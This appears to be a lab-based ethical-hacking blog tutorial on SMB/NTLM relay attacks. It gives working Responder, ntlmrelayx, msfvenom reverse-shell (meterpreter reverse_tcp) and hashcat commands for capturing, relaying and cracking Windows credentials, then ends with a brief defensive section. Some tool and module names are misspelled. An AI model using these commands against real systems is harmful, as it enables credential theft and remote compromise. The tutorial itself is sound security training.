SMB is a common network protocol for attacks, and therefore it makes sense that Kali Linux comes with SMB exploitation tools installed. Others need to be installed and utilized, these are often conveniently located on Github. One such tool is Responder. Another tool comes from CoreSecurity’s Impacket bundle. This is a variety of network exploitation scripts written in Python. The one we will be using is ntlmrelayx.py for performing NTLM Relay Attacks.
I show you how to do SMB Relay attacks and how to use Responder in a realistic lab environment in Become An Ethical Hacker, check the price on Amazon.
In this tutorial, I demonstrate how to first put Responder in listening mode and then to take advantage of its full features which can capture NTLM requests across the network leading to revealing NTLM hashes in cleartext. I also cover Impacket’s smbrelayx’s ability to intercept requests and respond with payloads automatically.
Table of Contents
Here’s What You Need
- Kali Linux Virtual Machine (VirtualBox)
- Windows Virtual Machine (VirtualBox)
- Impacket from Github
Windows NTLM Hashes
Some new terminology, NTLM, Net-NTLM, and NTLMv1 and NTLMv2. The thing to know is that Net-NTLM is the same as NTLMv(1/2).
NTLM Hashes
These are stored on the Domain Controller in the NTDS.dit file and locally in the SAM Security Account Manager database file. Here’s how these are exploited:
- ntlmrelayx.py automatically dumps the SAM file after successfully relaying a request.
- crackmapexec creates a shadow volume copy of the NTDS.dit file and parses out NTLM hashes.
Net-NTLM Hashes
Net-NTLM hashes look like this they are used in Windows network authentication. These are based on a users NT hash. They can NOT be used to pass the hash, while NTLM hashes can be.
9C32802781F07AF2FA67D50AAA9F7435:0101000000000000ECEFA524BF3DD5019548408BB87FAD2F000000000200060053004D004200010016
NTLM Relay Attack
So Windows machines are constantly reaching out over the network communicating their intentions to authenticate. What can be done knowing this behavior is commonplace? Say that you can listen for these requests and accept their authentication credentials.
Impacket
ntlmrelayx.py
Impacket’s ntlmrelayx can be setup to receive connections and host a payload that will automatically be served to the remote host connecting. This is especially useful when used in combination with the PowerShell exploitation framework Empire.
Before using the script, turn off SMB Server on Responder by editing the /etc/responder/Responder.conf file. And in addition to changing this default setting in Responder set some targets for the script to connect to.
$ echo '10.0.2.9' > remote-hosts.txt
$ ntlmrelayx.py -tf remote-hosts.txt
SMB Relay Attack to Get a Shell
These are the steps for using ntlmrelayx.py to automatically serve up a payload to a connecting host.
- Generate an msfvenom payload
- Start a multi-hanlder on MSF console or netcat for unstaged payloads
- ntmlrelayx.py -tf $target-IP -e ./payload.exe
- Run the net use \\fake command to set off the trigger on the victim machine to send the auth to the target.
SMB Relaying is not that difficult to pull off, the concept is often easier to grasp than its execution. Remember this though the account being relaying must be a local admin on the target.
sudo responder -I eth0 -rv
use exploit/multi/handler
exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.197 LPORT=1234 -f exe -o test.exe
python3 ntlmrelayx.py -t 10.0.0.33 -smb2support -e test.exeYou will need to use Impacket’s ntlmrelayx.py script to facilitate the attack.
With the payload set the next successful authentication will be relayed and the payload triggered.
Make a Windows Net Request
To kick off a network authentication request use net view or simply navigate in file explorer to a network share. This network share can be fake or it can be a real share as setup by using Impacket’s smbserver.py.
Capture Net-NTLM Hash with Responder
Responder Analyze Mode
Responder has a “analyze mode” and it can be used to observe normal network authentication activity takes place.
Immediately requests for the WPAD file are seen pouring in to Responder’s listening interface. The wpad file is basically a file that computers reach out to over the network for configuration settings.
To configure what is actively listening in Responder edit the default configuration file. Simply turn the features you do not want to Off.
Responder Capture Mode
Now capture Net-NTLM hashes.
Sometimes you will get a message from Responder that says “skipping previously captured hash for {user}”.
Then it will not show the newly captured hash because it is the same user, irritating.
So to fix that you have to restart Responder and pass it the -v flag and that will show the hash every time.
Crack the Hash with Hashcat
hashcat -m 5600 hashes\net-ntlm-hashes.txt known-password.txt -o cracked-passwords.txt
hashcat (v5.1.0) starting...Crack the Hash with John
John is able to crack the Net-NTLM password within seconds.
Use Metasploit’s SMB Server
auxililary/server/catpure/smb
Using Metasploit’s auxiliary smb server modules you can receive Net-NTLM responses from connecting hosts and reveal NTLM hashes in cleartext.
To kill the SMB server use kill job-id, for example “kill 0”.
Crack the Net-NTLM Hash with John
In this scenario I know the password and have put it in the password list I am using. John is capable of cracking a Net-NTLM hash, notice below how it cracked the hash from the Windows client.
Blue Team: Defend the Castle
To defend from this type of attack security teams use Group Policy Objects to disable LLMNR and Net-BIOS over TCP/IP. Also enable SMB signing which is disabled by default on all Windows operating systems except Server. Although there are still ways to get around the first two security settings!
- Use Group Policy to disable LLMNR and Net-BIOS over TCP/IP. Use PowerShell.
- Turn on SMB signing which is disabled by default on all Windows operating systems except Server.